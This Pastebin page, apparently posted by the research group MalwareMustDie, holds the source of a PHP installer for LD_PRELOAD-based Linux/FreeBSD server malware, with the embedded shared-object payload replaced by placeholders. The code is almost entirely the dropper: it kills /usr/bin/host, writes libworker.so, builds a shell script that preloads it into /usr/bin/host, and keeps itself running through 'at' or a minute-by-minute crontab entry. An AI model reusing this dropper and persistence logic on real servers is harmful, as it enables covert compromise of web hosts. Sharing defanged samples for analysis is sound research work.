SHARE
TWEET

jinxed source1 of .SO ELF LD_PRELOAD PHP malware installer

MalwareMustDie Jun 10th, 2014 371 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // Sample jinxed source code of the .SO ELD LD_PRELOAD PHP malware installer
  2. // MalwareMustDie
  3.  
  4. <?php
  5.  
  6. header("Content-type: text/plain");
  7. print "2842123700\n";
  8.  
  9. if (! function_exists('file_put_contents')) {
  10.         function file_put_contents($filename, $data) {
  11.                 $f = @fopen($filename, 'w');
  12.                 if (! $f)
  13.                         return false;
  14.                 $bytes = fwrite($f, $data);
  15.                 fclose($f);
  16.                 return $bytes;
  17.         }
  18. }
  19.  
  20. @system("killall -9 ".basename("/usr/bin/host"));
  21.  
  22. $so32 = "xxxxxxxxxx";
  23. $so64 = "xxxxxxxxxx";
  24. $arch = 64;
  25. if (intval("9223372036854775807") == 2147483647)
  26.         $arch = 32;
  27. print "Arch is ".$arch."\n";
  28. $so = $arch == 32 ? $so32 : $so64;
  29. $f = fopen("/usr/bin/host", "rb");
  30. if ($f) {
  31.         $n = unpack("C*", fread($f, 8));
  32.         $so[7] = sprintf("%c", $n[8]);
  33.         print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."\n";
  34.         fclose($f);
  35. }
  36. print "SO dumped ".file_put_contents("./libworker.so", $so)."\n";
  37. if (getenv("MAYHEM_DEBUG"))
  38.         exit(0);
  39. $AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  40. /* second stage dropper */
  41. $HBN=basename("/usr/bin/host");
  42. $SCP=getcwd();
  43. $SCR  ="#!/bin/sh\ncd '".$SCP."'\nif [ -f './libworker.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./libworker.so\n/usr/bin/host\nunset LD_PRELOAD\n";
  44. $SCR .="crontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n";
  45. @file_put_contents("1.sh", $SCR);
  46. @chmod("1.sh", 0777);
  47. /* try at now, file will be removed, crontab cleaned on success */
  48. @system("at now -f 1.sh", $ret);
  49. if ($ret == 0) {
  50.         for ($i = 0; $i < 5; $i++) {
  51.                 if (! @file_exists("1.sh")) {
  52.                         print "AT success\n";
  53.                         exit(0);
  54.                 }
  55.                 sleep(1);
  56.         }
  57. }
  58. @system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
  59. if ($ret == 0) {
  60.         for ($i = 0; $i < 62; $i++) {
  61.                 if (! @file_exists("1.sh")) {
  62.                         print "CRONTAB success\n";
  63.                         exit(0);
  64.                 }
  65.                 sleep(1);
  66.         }
  67. }
  68. print "Running straight\n";
  69. @system("./1.sh");
  70.  
  71. ?>
RAW Paste Data
Pastebin PRO Summer Special!
Get 60% OFF on Pastebin PRO accounts!
Top